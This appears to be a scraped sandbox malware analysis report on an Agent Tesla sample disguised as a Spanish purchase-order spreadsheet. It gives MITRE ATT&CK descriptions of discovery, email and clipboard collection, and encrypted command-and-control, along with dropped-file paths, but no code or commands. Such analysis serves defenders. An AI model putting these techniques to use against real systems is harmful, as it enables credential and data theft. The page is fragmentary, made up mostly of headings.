Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingswithgreatsituationshandletotheprogress[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11E2C553.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\883E1738.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B755764F.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB16081A.emf

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll

Windows Analysis Report
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre